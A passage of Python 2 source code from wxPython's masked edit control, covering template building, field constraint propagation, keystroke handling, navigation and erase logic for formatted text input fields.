fillChar = self._ctrl_constraints._fillChar
self._fillChar[pos] = fillChar
# Replace any current old fillchar with new one in current value;
# if action required, set reset_value flag so we can take that action
# after we're all done
if self.controlInitialized and old_fillchars and old_fillchars.has_key(pos) and curvalue:
if curvalue[pos] == old_fillchars[pos] and old_fillchars[pos] != fillChar:
reset_value = True
curvalue[pos] = fillChar
if not field._defaultValue and not self._ctrl_constraints._defaultValue:
#### dbg('no default value')
self._template += fillChar
field._template += fillChar
elif field._defaultValue and not reset_default:
#### dbg('len(field._defaultValue):', len(field._defaultValue))
#### dbg('pos-start:', pos-start)
if len(field._defaultValue) > pos-start:
#### dbg('field._defaultValue[pos-start]: "%s"' % field._defaultValue[pos-start])
self._template += field._defaultValue[pos-start]
field._template += field._defaultValue[pos-start]
else:
#### dbg('field default not long enough; using fillChar')
self._template += fillChar
field._template += fillChar
else:
if len(self._ctrl_constraints._defaultValue) > pos:
#### dbg('using control default')
self._template += self._ctrl_constraints._defaultValue[pos]
field._template += self._ctrl_constraints._defaultValue[pos]
else:
#### dbg('ctrl default not long enough; using fillChar')
self._template += fillChar
field._template += fillChar
#### dbg('field[%d]._template now "%s"' % (field._index, field._template))
#### dbg('self._template now "%s"' % self._template)
else:
self._template += self._mask[pos]
self._fields[-1]._template = self._template # (for consistency)
if curvalue: # had an old value, put new one back together
newvalue = string.join(curvalue, "")
else:
newvalue = None
if default_set:
self._defaultValue = self._template
## dbg('self._defaultValue:', self._defaultValue)
if not self.IsEmpty(self._defaultValue) and not self.IsValid(self._defaultValue):
#### dbg(indent=0)
ve = ValueError('Default value of "%s" is not a valid value for control "%s"' % (self._defaultValue, self.name))
ve.value = self._defaultValue
raise ve
# if no fillchar change, but old value == old template, replace it:
if newvalue == old_template:
newvalue = self._template
reset_value = True
else:
self._defaultValue = None
if reset_value:
## dbg('resetting value to: "%s"' % newvalue)
pos = self._GetInsertionPoint()
sel_start, sel_to = self._GetSelection()
self._SetValue(newvalue)
self._SetInsertionPoint(pos)
self._SetSelection(sel_start, sel_to)
def _propagateConstraints(self, **reset_args):
"""
Subroutine for propagating changes to control-level constraints and
formatting to the individual fields as appropriate.
"""
parent_codes = self._ctrl_constraints._formatcodes
parent_includes = self._ctrl_constraints._includeChars
parent_excludes = self._ctrl_constraints._excludeChars
for i in self._field_indices:
field = self._fields[i]
inherit_args = {}
if len(self._field_indices) == 1:
inherit_args['formatcodes'] = parent_codes
inherit_args['includeChars'] = parent_includes
inherit_args['excludeChars'] = parent_excludes
else:
field_codes = current_codes = field._GetParameter('formatcodes')
for c in parent_codes:
if c not in field_codes: field_codes += c
if field_codes != current_codes:
inherit_args['formatcodes'] = field_codes
include_chars = current_includes = field._GetParameter('includeChars')
for c in parent_includes:
if not c in include_chars: include_chars += c
if include_chars != current_includes:
inherit_args['includeChars'] = include_chars
exclude_chars = current_excludes = field._GetParameter('excludeChars')
for c in parent_excludes:
if not c in exclude_chars: exclude_chars += c
if exclude_chars != current_excludes:
inherit_args['excludeChars'] = exclude_chars
if reset_args.has_key('defaultValue') and reset_args['defaultValue']:
inherit_args['defaultValue'] = "" # (reset for field)
for param in Field.propagating_params:
#### dbg('reset_args.has_key(%s)?' % param, reset_args.has_key(param))
#### dbg('reset_args.has_key(%(param)s) and reset_args[%(param)s]?' % locals(), reset_args.has_key(param) and reset_args[param])
if reset_args.has_key(param):
inherit_args[param] = self.GetCtrlParameter(param)
#### dbg('inherit_args[%s]' % param, inherit_args[param])
if inherit_args:
field._SetParameters(**inherit_args)
field._ValidateParameters(**inherit_args)
def _validateChoices(self):
"""
Subroutine that validates that all choices for given fields are at
least of the necessary length, and that they all would be valid pastes
if pasted into their respective fields.
"""
for field in self._fields.values():
if field._choices:
index = field._index
if len(self._field_indices) == 1 and index == 0 and field._choices == self._ctrl_constraints._choices:
## dbg('skipping (duplicate) choice validation of field 0')
continue
#### dbg('checking for choices for field', field._index)
start, end = field._extent
field_length = end - start
#### dbg('start, end, length:', start, end, field_length)
for choice in field._choices:
#### dbg('testing "%s"' % choice)
valid_paste, ignore, replace_to = self._validatePaste(choice, start, end)
if not valid_paste:
#### dbg(indent=0)
ve = ValueError('"%s" could not be entered into field %d of control "%s"' % (choice, index, self.name))
ve.value = choice
ve.index = index
raise ve
elif replace_to > end:
#### dbg(indent=0)
ve = ValueError('"%s" will not fit into field %d of control "%s"' (choice, index, self.name))
ve.value = choice
ve.index = index
raise ve
#### dbg(choice, 'valid in field', index)
def _configure(self, mask, **reset_args):
"""
This function sets flags for automatic styling options. It is
called whenever a control or field-level parameter is set/changed.
This routine does the bulk of the interdependent parameter processing, determining
the field extents of the mask if changed, resetting parameters as appropriate,
determining the overall template value for the control, etc.
reset_args is supplied if called from control's .SetCtrlParameters()
routine, and indicates which if any parameters which can be
overridden by individual fields have been reset by request for the
whole control.
"""
## dbg(suspend=1)
## dbg('MaskedEditMixin::_configure("%s")' % mask, indent=1)
# Preprocess specified mask to expand {n} syntax, handle escaped
# mask characters, etc and build the resulting positionally keyed
# dictionary for which positions are mask vs. template characters:
self._mask, self._ismasked, self._explicit_field_boundaries = self._processMask(mask)
self._masklength = len(self._mask)
#### dbg('processed mask:', self._mask)
# Preserve original mask specified, for subsequent reprocessing
# if parameters change.
## dbg('mask: "%s"' % self._mask, 'previous mask: "%s"' % self._previous_mask)
self._previous_mask = mask # save unexpanded mask for next time
# Set expanded mask and extent of field -1 to width of entire control:
self._ctrl_constraints._SetParameters(mask = self._mask, extent=(0,self._masklength))
# Go parse mask to determine where each field is, construct field
# instances as necessary, configure them with those extents, and
# build lookup table mapping each position for control to its corresponding
# field.
#### dbg('calculating field extents')
self._calcFieldExtents()
# Go process defaultValues and fillchars to construct the overall
# template, and adjust the current value as necessary:
reset_fillchar = reset_args.has_key('fillChar') and reset_args['fillChar']
reset_default = reset_args.has_key('defaultValue') and reset_args['defaultValue']
#### dbg('calculating template')
self._calcTemplate(reset_fillchar, reset_default)
# Propagate control-level formatting and character constraints to each
# field if they don't already have them; if only one field, propagate
# control-level validation constraints to field as well:
#### dbg('propagating constraints')
self._propagateConstraints(**reset_args)
if self._isFloat and self._fields[0]._groupChar == self._decimalChar:
raise AttributeError('groupChar (%s) and decimalChar (%s) must be distinct.' %
(self._fields[0]._groupChar, self._decimalChar) )
#### dbg('fields:', indent=1)
## for i in [-1] + self._field_indices:
#### dbg('field %d:' % i, self._fields[i].__dict__)
#### dbg(indent=0)
# Set up special parameters for numeric control, if appropriate:
if self._signOk:
self._signpos = 0 # assume it starts here, but it will move around on floats
signkeys = ['-', '+', ' ']
if self._useParens:
signkeys += ['(', ')']
for key in signkeys:
keycode = ord(key)
if not self._keyhandlers.has_key(keycode):
self._SetKeyHandler(key, self._OnChangeSign)
elif self._isInt or self._isFloat:
signkeys = ['-', '+', ' ', '(', ')']
for key in signkeys:
keycode = ord(key)
if self._keyhandlers.has_key(keycode) and self._keyhandlers[keycode] == self._OnChangeSign:
self._SetKeyHandler(key, None)
if self._isFloat or self._isInt:
if self.controlInitialized:
value = self._GetValue()
#### dbg('value: "%s"' % value, 'len(value):', len(value),
## 'len(self._ctrl_constraints._mask):',len(self._ctrl_constraints._mask))
if len(value) < len(self._ctrl_constraints._mask):
newvalue = value
if self._useParens and len(newvalue) < len(self._ctrl_constraints._mask) and newvalue.find('(') == -1:
newvalue += ' '
if self._signOk and len(newvalue) < len(self._ctrl_constraints._mask) and newvalue.find(')') == -1:
newvalue = ' ' + newvalue
if len(newvalue) < len(self._ctrl_constraints._mask):
if self._ctrl_constraints._alignRight:
newvalue = newvalue.rjust(len(self._ctrl_constraints._mask))
else:
newvalue = newvalue.ljust(len(self._ctrl_constraints._mask))
## dbg('old value: "%s"' % value)
## dbg('new value: "%s"' % newvalue)
try:
self._ChangeValue(newvalue)
except Exception, e:
## dbg('exception raised:', e, 'resetting to initial value')
self._SetInitialValue()
elif len(value) > len(self._ctrl_constraints._mask):
newvalue = value
if not self._useParens and newvalue[-1] == ' ':
newvalue = newvalue[:-1]
if not self._signOk and len(newvalue) > len(self._ctrl_constraints._mask):
newvalue = newvalue[1:]
if not self._signOk:
newvalue, signpos, right_signpos = self._getSignedValue(newvalue)
## dbg('old value: "%s"' % value)
## dbg('new value: "%s"' % newvalue)
try:
self._ChangeValue(newvalue)
except Exception, e:
## dbg('exception raised:', e, 'resetting to initial value')
self._SetInitialValue()
elif not self._signOk and ('(' in value or '-' in value):
newvalue, signpos, right_signpos = self._getSignedValue(value)
## dbg('old value: "%s"' % value)
## dbg('new value: "%s"' % newvalue)
try:
self._ChangeValue(newvalue)
except e:
## dbg('exception raised:', e, 'resetting to initial value')
self._SetInitialValue()
# Replace up/down arrow default handling:
# make down act like tab, up act like shift-tab:
#### dbg('Registering numeric navigation and control handlers (if not already set)')
if not self._keyhandlers.has_key(wx.WXK_DOWN):
self._SetKeycodeHandler(wx.WXK_DOWN, self._OnChangeField)
if not self._keyhandlers.has_key(wx.WXK_NUMPAD_DOWN):
self._SetKeycodeHandler(wx.WXK_DOWN, self._OnChangeField)
if not self._keyhandlers.has_key(wx.WXK_UP):
self._SetKeycodeHandler(wx.WXK_UP, self._OnUpNumeric) # (adds "shift" to up arrow, and calls _OnChangeField)
if not self._keyhandlers.has_key(wx.WXK_NUMPAD_UP):
self._SetKeycodeHandler(wx.WXK_UP, self._OnUpNumeric) # (adds "shift" to up arrow, and calls _OnChangeField)
# On ., truncate contents right of cursor to decimal point (if any)
# leaves cursor after decimal point if floating point, otherwise at 0.
if not self._keyhandlers.has_key(ord(self._decimalChar)) or self._keyhandlers[ord(self._decimalChar)] != self._OnDecimalPoint:
self._SetKeyHandler(self._decimalChar, self._OnDecimalPoint)
if not self._keyhandlers.has_key(ord(self._shiftDecimalChar)) or self._keyhandlers[ord(self._shiftDecimalChar)] != self._OnChangeField:
self._SetKeyHandler(self._shiftDecimalChar, self._OnChangeField) # (Shift-'.' == '>' on US keyboards)
# Allow selective insert of groupchar in numbers:
if not self._keyhandlers.has_key(ord(self._fields[0]._groupChar)) or self._keyhandlers[ord(self._fields[0]._groupChar)] != self._OnGroupChar:
self._SetKeyHandler(self._fields[0]._groupChar, self._OnGroupChar)
## dbg(indent=0, suspend=0)
def _SetInitialValue(self, value=""):
"""
fills the control with the generated or supplied default value.
It will also set/reset the font if necessary and apply
formatting to the control at this time.
"""
## dbg('MaskedEditMixin::_SetInitialValue("%s")' % value, indent=1)
if not value:
self._prevValue = self._curValue = self._template
# don't apply external validation rules in this case, as template may
# not coincide with "legal" value...
try:
if isinstance(self, wx.TextCtrl):
self._ChangeValue(self._curValue) # note the use of "raw" ._ChangeValue()...
else:
self._SetValue(self._curValue) # note the use of "raw" ._SetValue()...
except Exception, e:
## dbg('exception thrown:', e, indent=0)
raise
else:
# Otherwise apply validation as appropriate to passed value:
#### dbg('value = "%s", length:' % value, len(value))
self._prevValue = self._curValue = value
try:
if isinstance(self, wx.TextCtrl):
self.ChangeValue(value) # use public (validating) .SetValue()
else:
self.SetValue(value)
except Exception, e:
## dbg('exception thrown:', e, indent=0)
raise
# Set value/type-specific formatting
self._applyFormatting()
## dbg(indent=0)
def _calcSize(self, size=None):
""" Calculate automatic size if allowed; must be called after the base control is instantiated"""
#### dbg('MaskedEditMixin::_calcSize', indent=1)
cont = (size is None or size == wx.DefaultSize)
if cont and self._autofit:
sizing_text = 'M' * self._masklength
if wx.Platform != "__WXMSW__": # give it a little extra space
sizing_text += 'M'
if wx.Platform == "__WXMAC__": # give it even a little more...
sizing_text += 'M'
#### dbg('len(sizing_text):', len(sizing_text), 'sizing_text: "%s"' % sizing_text)
w, h = self.GetTextExtent(sizing_text)
size = (w+4, self.GetSize().height)
#### dbg('size:', size, indent=0)
return size
def _setFont(self):
""" Set the control's font typeface -- pass the font name as str."""
#### dbg('MaskedEditMixin::_setFont', indent=1)
if not self._useFixedWidthFont:
self._font = wx.SystemSettings_GetFont(wx.SYS_DEFAULT_GUI_FONT)
else:
font = self.GetFont() # get size, weight, etc from current font
points = font.GetPointSize()
if 'wxMac' in wx.PlatformInfo \
and self.GetWindowVariant() == wx.WINDOW_VARIANT_MINI:
points -= 1
# Set to teletype font (guaranteed to be mappable to all wxWindows
# platforms:
self._font = wx.Font( points, wx.TELETYPE, font.GetStyle(),
font.GetWeight(), font.GetUnderlined())
#### dbg('font string: "%s"' % font.GetNativeFontInfo().ToString())
self.SetFont(self._font)
#### dbg(indent=0)
def _OnTextChange(self, event):
"""
Handler for EVT_TEXT event.
self._Change() is provided for subclasses, and may return False to
skip this method logic. This function returns True if the event
detected was a legitimate event, or False if it was a "bogus"
EVT_TEXT event. (NOTE: There is currently an issue with calling
.SetValue from within the EVT_CHAR handler that causes duplicate
EVT_TEXT events for the same change.)
"""
newvalue = self._GetValue()
## dbg('MaskedEditMixin::_OnTextChange: value: "%s"' % newvalue, indent=1)
bValid = False
if self._ignoreChange: # ie. if an "intermediate text change event"
## dbg(indent=0)
return bValid
##! WS: For some inexplicable reason, every wx.TextCtrl.SetValue
## call is generating two (2) EVT_TEXT events. On certain platforms,
## (eg. linux/GTK) the 1st is an empty string value.
## This is the only mechanism I can find to mask this problem:
if newvalue == self._curValue or len(newvalue) == 0:
## dbg('ignoring bogus text change event', indent=0)
pass
else:
## dbg('curvalue: "%s", newvalue: "%s", len(newvalue): %d' % (self._curValue, newvalue, len(newvalue)))
if self._Change():
if self._signOk and self._isNeg and newvalue.find('-') == -1 and newvalue.find('(') == -1:
## dbg('clearing self._isNeg')
self._isNeg = False
text, self._signpos, self._right_signpos = self._getSignedValue()
self._CheckValid() # Recolor control as appropriate
## dbg('calling event.Skip()')
event.Skip()
bValid = True
self._prevValue = self._curValue # save for undo
self._curValue = newvalue # Save last seen value for next iteration
## dbg(indent=0)
return bValid
def _OnKeyDown(self, event):
"""
This function allows the control to capture Ctrl-events like Ctrl-tab,
that are not normally seen by the "cooked" EVT_CHAR routine.
"""
# Get keypress value, adjusted by control options (e.g. convert to upper etc)
key = event.GetKeyCode()
if key in self._nav and event.ControlDown():
# then this is the only place we will likely see these events;
# process them now:
## dbg('MaskedEditMixin::OnKeyDown: calling _OnChar')
self._OnChar(event)
return
# else allow regular EVT_CHAR key processing
event.Skip()
def _OnChar(self, event):
"""
This is the engine of MaskedEdit controls. It examines each keystroke,
decides if it's allowed, where it should go or what action to take.
"""
## dbg('MaskedEditMixin::_OnChar', indent=1)
# Get keypress value, adjusted by control options (e.g. convert to upper etc)
key = event.GetKeyCode()
orig_pos = self._GetInsertionPoint()
orig_value = self._GetValue()
## dbg('keycode = ', key)
## dbg('current pos = ', orig_pos)
## dbg('current selection = ', self._GetSelection())
if not self._Keypress(key):
## dbg(indent=0)
return
# If no format string for this control, or the control is marked as "read-only",
# skip the rest of the special processing, and just "do the standard thing:"
if not self._mask or not self._IsEditable():
event.Skip()
## dbg(indent=0)
return
# Process navigation and control keys first, with
# position/selection unadulterated:
if key in self._nav + self._control:
if self._keyhandlers.has_key(key):
keep_processing = self._keyhandlers[key](event)
if self._GetValue() != orig_value:
self.modified = True
if not keep_processing:
## dbg(indent=0)
return
self._applyFormatting()
## dbg(indent=0)
return
# Else... adjust the position as necessary for next input key,
# and determine resulting selection:
pos = self._adjustPos( orig_pos, key ) ## get insertion position, adjusted as needed
sel_start, sel_to = self._GetSelection() ## check for a range of selected text
## dbg("pos, sel_start, sel_to:", pos, sel_start, sel_to)
keep_processing = True
# Capture user past end of format field
if pos > len(self.maskdict):
## dbg("field length exceeded:",pos)
keep_processing = False
key = self._adjustKey(pos, key) # apply formatting constraints to key:
if self._keyhandlers.has_key(key):
# there's an override for default behavior; use override function instead
## dbg('using supplied key handler:', self._keyhandlers[key])
keep_processing = self._keyhandlers[key](event)
if self._GetValue() != orig_value:
self.modified = True
if not keep_processing:
## dbg(indent=0)
return
# else skip default processing, but do final formatting
if key in wx_control_keycodes:
## dbg('key in wx_control_keycodes')
event.Skip() # non-printable; let base control handle it
keep_processing = False
else:
field = self._FindField(pos)
if 'unicode' in wx.PlatformInfo:
if key < 256:
char = chr(key) # (must work if we got this far)
char = char.decode(self._defaultEncoding)
else:
char = unichr(event.GetUnicodeKey())
## dbg('unicode char:', char)
excludes = u''
if type(field._excludeChars) != types.UnicodeType:
excludes += field._excludeChars.decode(self._defaultEncoding)
if type(self._ctrl_constraints) != types.UnicodeType:
excludes += self._ctrl_constraints._excludeChars.decode(self._defaultEncoding)
else:
char = chr(key) # (must work if we got this far)
excludes = field._excludeChars + self._ctrl_constraints._excludeChars
## dbg("key ='%s'" % chr(key))
if chr(key) == ' ':
## dbg('okSpaces?', field._okSpaces)
pass
if char in excludes:
keep_processing = False
if keep_processing and self._isCharAllowed( char, pos, checkRegex = True ):
## dbg("key allowed by mask")
# insert key into candidate new value, but don't change control yet:
oldstr = self._GetValue()
newstr, newpos, new_select_to, match_field, match_index = self._insertKey(
char, pos, sel_start, sel_to, self._GetValue(), allowAutoSelect = True)
## dbg("str with '%s' inserted:" % char, '"%s"' % newstr)
if self._ctrl_constraints._validRequired and not self.IsValid(newstr):
## dbg('not valid; checking to see if adjusted string is:')
keep_processing = False
if self._isFloat and newstr != self._template:
newstr = self._adjustFloat(newstr)
## dbg('adjusted str:', newstr)
if self.IsValid(newstr):
## dbg("it is!")
keep_processing = True
wx.CallAfter(self._SetInsertionPoint, self._decimalpos)
if not keep_processing:
## dbg("key disallowed by validation")
if not wx.Validator_IsSilent() and orig_pos == pos:
wx.Bell()
if keep_processing:
unadjusted = newstr
# special case: adjust date value as necessary:
if self._isDate and newstr != self._template:
newstr = self._adjustDate(newstr)
## dbg('adjusted newstr:', newstr)
if newstr != orig_value:
self.modified = True
wx.CallAfter(self._SetValue, newstr)
# Adjust insertion point on date if just entered 2 digit year, and there are now 4 digits:
if not self.IsDefault() and self._isDate and self._4digityear:
year2dig = self._dateExtent - 2
if pos == year2dig and unadjusted[year2dig] != newstr[year2dig]:
newpos = pos+2
## dbg('queuing insertion point: (%d)' % newpos)
wx.CallAfter(self._SetInsertionPoint, newpos)
if match_field is not None:
## dbg('matched field')
self._OnAutoSelect(match_field, match_index)
if new_select_to != newpos:
## dbg('queuing selection: (%d, %d)' % (newpos, new_select_to))
wx.CallAfter(self._SetSelection, newpos, new_select_to)
else:
newfield = self._FindField(newpos)
if newfield != field and newfield._selectOnFieldEntry:
## dbg('queuing insertion point: (%d)' % newfield._extent[0])
wx.CallAfter(self._SetInsertionPoint, newfield._extent[0])
## dbg('queuing selection: (%d, %d)' % (newfield._extent[0], newfield._extent[1]))
wx.CallAfter(self._SetSelection, newfield._extent[0], newfield._extent[1])
else:
wx.CallAfter(self._SetSelection, newpos, new_select_to)
keep_processing = False
elif keep_processing:
## dbg('char not allowed')
keep_processing = False
if (not wx.Validator_IsSilent()) and orig_pos == pos:
wx.Bell()
self._applyFormatting()
# Move to next insertion point
if keep_processing and key not in self._nav:
pos = self._GetInsertionPoint()
next_entry = self._findNextEntry( pos )
if pos != next_entry:
## dbg("moving from %(pos)d to next valid entry: %(next_entry)d" % locals())
wx.CallAfter(self._SetInsertionPoint, next_entry )
if self._isTemplateChar(pos):
self._AdjustField(pos)
## dbg(indent=0)
def _FindFieldExtent(self, pos=None, getslice=False, value=None):
""" returns editable extent of field corresponding to
position pos, and, optionally, the contents of that field
in the control or the value specified.
Template chars are bound to the preceding field.
For masks beginning with template chars, these chars are ignored
when calculating the current field.
Eg: with template (###) ###-####,
>>> self._FindFieldExtent(pos=0)
1, 4
>>> self._FindFieldExtent(pos=1)
1, 4
>>> self._FindFieldExtent(pos=5)
1, 4
>>> self._FindFieldExtent(pos=6)
6, 9
>>> self._FindFieldExtent(pos=10)
10, 14
etc.
"""
## dbg('MaskedEditMixin::_FindFieldExtent(pos=%s, getslice=%s)' % (str(pos), str(getslice)) ,indent=1)
field = self._FindField(pos)
if not field:
if getslice:
return None, None, ""
else:
return None, None
edit_start, edit_end = field._extent
if getslice:
if value is None: value = self._GetValue()
slice = value[edit_start:edit_end]
## dbg('edit_start:', edit_start, 'edit_end:', edit_end, 'slice: "%s"' % slice)
## dbg(indent=0)
return edit_start, edit_end, slice
else:
## dbg('edit_start:', edit_start, 'edit_end:', edit_end)
## dbg(indent=0)
return edit_start, edit_end
def _FindField(self, pos=None):
"""
Returns the field instance in which pos resides.
Template chars are bound to the preceding field.
For masks beginning with template chars, these chars are ignored
when calculating the current field.
"""
#### dbg('MaskedEditMixin::_FindField(pos=%s)' % str(pos) ,indent=1)
if pos is None: pos = self._GetInsertionPoint()
elif pos < 0 or pos > self._masklength:
raise IndexError('position %s out of range of control' % str(pos))
if len(self._fields) == 0:
## dbg(indent=0)
return None
# else...
#### dbg(indent=0)
return self._fields[self._lookupField[pos]]
def ClearValue(self):
""" Blanks the current control value by replacing it with the default value."""
## dbg("MaskedEditMixin::ClearValue - value reset to default value (template)")
self._SetValue( self._template )
self._SetInsertionPoint(0)
self.Refresh()
def ClearValueAlt(self):
""" Blanks the current control value by replacing it with the default value.
Using ChangeValue, so not to fire a change event"""
## dbg("MaskedEditMixin::ClearValueAlt - value reset to default value (template)")
self._ChangeValue( self._template )
self._SetInsertionPoint(0)
self.Refresh()
def _baseCtrlEventHandler(self, event):
"""
This function is used whenever a key should be handled by the base control.
"""
event.Skip()
return False
def _OnUpNumeric(self, event):
"""
Makes up-arrow act like shift-tab should; ie. take you to start of
previous field.
"""
## dbg('MaskedEditMixin::_OnUpNumeric', indent=1)
event.m_shiftDown = 1
## dbg('event.ShiftDown()?', event.ShiftDown())
self._OnChangeField(event)
## dbg(indent=0)
def _OnArrow(self, event):
"""
Used in response to left/right navigation keys; makes these actions skip
over mask template chars.
"""
## dbg("MaskedEditMixin::_OnArrow", indent=1)
pos = self._GetInsertionPoint()
keycode = event.GetKeyCode()
sel_start, sel_to = self._GetSelection()
entry_end = self._goEnd(getPosOnly=True)
if keycode in (wx.WXK_RIGHT, wx.WXK_DOWN, wx.WXK_NUMPAD_RIGHT, wx.WXK_NUMPAD_DOWN):
if( ( not self._isTemplateChar(pos) and pos+1 > entry_end)
or ( self._isTemplateChar(pos) and pos >= entry_end) ):
## dbg("can't advance", indent=0)
return False
elif self._isTemplateChar(pos):
self._AdjustField(pos)
elif keycode in (wx.WXK_LEFT, wx.WXK_UP, wx.WXK_NUMPAD_LEFT, wx.WXK_NUMPAD_UP) and sel_start == sel_to and pos > 0 and self._isTemplateChar(pos-1):
## dbg('adjusting field')
self._AdjustField(pos)
# treat as shifted up/down arrows as tab/reverse tab:
if event.ShiftDown() and keycode in (wx.WXK_UP, wx.WXK_DOWN, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_DOWN):
# remove "shifting" and treat as (forward) tab:
event.m_shiftDown = False
keep_processing = self._OnChangeField(event)
elif self._FindField(pos)._selectOnFieldEntry:
if( keycode in (wx.WXK_UP, wx.WXK_LEFT, wx.WXK_NUMPAD_UP, wx.WXK_NUMPAD_LEFT)
and sel_start != 0
and self._isTemplateChar(sel_start-1)
and sel_start != self._masklength
and not self._signOk and not self._useParens):
# call _OnChangeField to handle "ctrl-shifted event"
# (which moves to previous field and selects it.)
event.m_shiftDown = True
event.m_ControlDown = True
keep_processing = self._OnChangeField(event)
elif( keycode in (wx.WXK_DOWN, wx.WXK_RIGHT, wx.WXK_NUMPAD_DOWN, wx.WXK_NUMPAD_RIGHT)
and sel_to != self._masklength
and self._isTemplateChar(sel_to)):
# when changing field to the right, ensure don't accidentally go left instead
event.m_shiftDown = False
keep_processing = self._OnChangeField(event)
else:
# treat arrows as normal, allowing selection
# as appropriate:
## dbg('using base ctrl event processing')
event.Skip()
else:
if( (sel_to == self._fields[0]._extent[0] and keycode in (wx.WXK_LEFT, wx.WXK_NUMPAD_LEFT) )
or (sel_to == self._masklength and keycode in (wx.WXK_RIGHT, wx.WXK_NUMPAD_RIGHT) ) ):
if not wx.Validator_IsSilent():
wx.Bell()
else:
# treat arrows as normal, allowing selection
# as appropriate:
## dbg('using base event processing')
event.Skip()
keep_processing = False
## dbg(indent=0)
return keep_processing
def _OnCtrl_S(self, event):
""" Default Ctrl-S handler; prints value information if demo enabled. """
## dbg("MaskedEditMixin::_OnCtrl_S")
if self._demo:
print 'MaskedEditMixin.GetValue() = "%s"\nMaskedEditMixin.GetPlainValue() = "%s"' % (self.GetValue(), self.GetPlainValue())
print "Valid? => " + str(self.IsValid())
print "Current field, start, end, value =", str( self._FindFieldExtent(getslice=True))
return False
def _OnCtrl_X(self, event=None):
""" Handles ctrl-x keypress in control and Cut operation on context menu.
Should return False to skip other processing. """
## dbg("MaskedEditMixin::_OnCtrl_X", indent=1)
self.Cut()
## dbg(indent=0)
return False
def _OnCtrl_C(self, event=None):
""" Handles ctrl-C keypress in control and Copy operation on context menu.
Uses base control handling. Should return False to skip other processing."""
self.Copy()
return False
def _OnCtrl_V(self, event=None):
""" Handles ctrl-V keypress in control and Paste operation on context menu.
Should return False to skip other processing. """
## dbg("MaskedEditMixin::_OnCtrl_V", indent=1)
self.Paste()
## dbg(indent=0)
return False
def _OnInsert(self, event=None):
""" Handles shift-insert and control-insert operations (paste and copy, respectively)"""
## dbg("MaskedEditMixin::_OnInsert", indent=1)
if event and isinstance(event, wx.KeyEvent):
if event.ShiftDown():
self.Paste()
elif event.ControlDown():
self.Copy()
# (else do nothing)
# (else do nothing)
## dbg(indent=0)
return False
def _OnDelete(self, event=None):
""" Handles shift-delete and delete operations (cut and erase, respectively)"""
## dbg("MaskedEditMixin::_OnDelete", indent=1)
if event and isinstance(event, wx.KeyEvent):
if event.ShiftDown():
self.Cut()
else:
self._OnErase(event)
else:
self._OnErase(event)
## dbg(indent=0)
return False
def _OnCtrl_Z(self, event=None):
""" Handles ctrl-Z keypress in control and Undo operation on context menu.
Should return False to skip other processing. """
## dbg("MaskedEditMixin::_OnCtrl_Z", indent=1)
self.Undo()
## dbg(indent=0)
return False
def _OnCtrl_A(self,event=None):
""" Handles ctrl-a keypress in control. Should return False to skip other processing. """
end = self._goEnd(getPosOnly=True)
if not event or (isinstance(event, wx.KeyEvent) and event.ShiftDown()):
wx.CallAfter(self._SetInsertionPoint, 0)
wx.CallAfter(self._SetSelection, 0, self._masklength)
else:
wx.CallAfter(self._SetInsertionPoint, 0)
wx.CallAfter(self._SetSelection, 0, end)
return False
def _OnErase(self, event=None, just_return_value=False):
""" Handles backspace and delete keypress in control. Should return False to skip other processing."""
## dbg("MaskedEditMixin::_OnErase", indent=1)
sel_start, sel_to = self._GetSelection() ## check for a range of selected text
if event is None: # called as action routine from Cut() operation.
key = wx.WXK_DELETE
else:
key = event.GetKeyCode()
field = self._FindField(sel_to)
start, end = field._extent
value = self._GetValue()
oldstart = sel_start
# If trying to erase beyond "legal" bounds, disallow operation:
if( (sel_to == 0 and key == wx.WXK_BACK)
or (self._signOk and sel_to == 1 and value[0] == ' ' and key == wx.WXK_BACK)
or (sel_to == self._masklength and sel_start == sel_to and key in (wx.WXK_DELETE, wx.WXK_NUMPAD_DELETE) and not field._insertRight)
or (self._signOk and self._useParens
and sel_start == sel_to
and sel_to == self._masklength - 1
and value[sel_to] == ' ' and key in (wx.WXK_DELETE, wx.WXK_NUMPAD_DELETE) and not field._insertRight) ):
if not wx.Validator_IsSilent():
wx.Bell()
## dbg(indent=0)
return False
if( field._insertRight # an insert-right field
and value[start:end] != self._template[start:end] # and field not empty
and sel_start >= start # and selection starts in field
and ((sel_to == sel_start # and no selection
and sel_to == end # and cursor at right edge
and key in (wx.WXK_BACK, wx.WXK_DELETE, wx.WXK_NUMPAD_DELETE)) # and either delete or backspace key
or # or
(key == wx.WXK_BACK # backspacing
and (sel_to == end # and selection ends at right edge
or sel_to < end and field._allowInsert)) ) ): # or allow right insert at any point in field
## dbg('delete left')
# if backspace but left of cursor is empty, adjust cursor right before deleting
while( key == wx.WXK_BACK
and sel_start == sel_to
and sel_start < end
and value[start:sel_start] == self._template[start:sel_start]):
sel_start += 1
sel_to = sel_start
## dbg('sel_start, start:', sel_start, start)
if sel_start == sel_to:
keep = sel_start -1
else:
keep = sel_start
newfield = value[start:keep] + value[sel_to:end]
# handle sign char moving from outside field into the field:
move_sign_into_field = False
if not field._padZero and self._signOk and self._isNeg and value[0] in ('-', '('):
signchar = value[0]
newfield = signchar + newfield
move_sign_into_field = True
## dbg('cut newfield: "%s"' % newfield)
# handle what should fill in from the left:
left = ""
for i in range(start, end - len(newfield)):
if field._padZero:
left += '0'
elif( self._signOk and self._isNeg and i == 1
and ((self._useParens and newfield.find('(') == -1)
or (not self._useParens and newfield.find('-') == -1)) ):
left += ' '
else:
left += self._template[i] # this can produce strange results in combination with default values...
newfield = left + newfield
## dbg('filled newfield: "%s"' % newfield)
newstr = value[:start] + newfield + value[end:]
# (handle sign located in "mask position" in front of field prior to delete)
if move_sign_into_field:
newstr = ' ' + newstr[1:]
pos = sel_to
else:
# handle erasure of (left) sign, moving selection accordingly...
if self._signOk and sel_start == 0:
newstr = value = ' ' + value[1:]
sel_start += 1
if field._allowInsert and sel_start >= start:
# selection (if any) falls within current insert-capable field:
select_len = sel_to - sel_start
# determine where cursor should end up:
if key == wx.WXK_BACK:
if select_len == 0:
newpos = sel_start -1
else:
newpos = sel_start
erase_to = sel_to
else:
newpos = sel_start
if sel_to == sel_start:
erase_to = sel_to + 1
else:
erase_to = sel_to
if self._isTemplateChar(newpos) and select_len == 0:
if self._signOk:
if value[newpos] in ('(', '-'):
newpos += 1 # don't move cusor
newstr = ' ' + value[newpos:]
elif value[newpos] == ')':
# erase right sign, but don't move cursor; (matching left sign handled later)
newstr = value[:newpos] + ' '
else:
# no deletion; just move cursor
newstr = value
else:
# no deletion; just move cursor
newstr = value
else:
if erase_to > end: erase_to = end
erase_len = erase_to - newpos
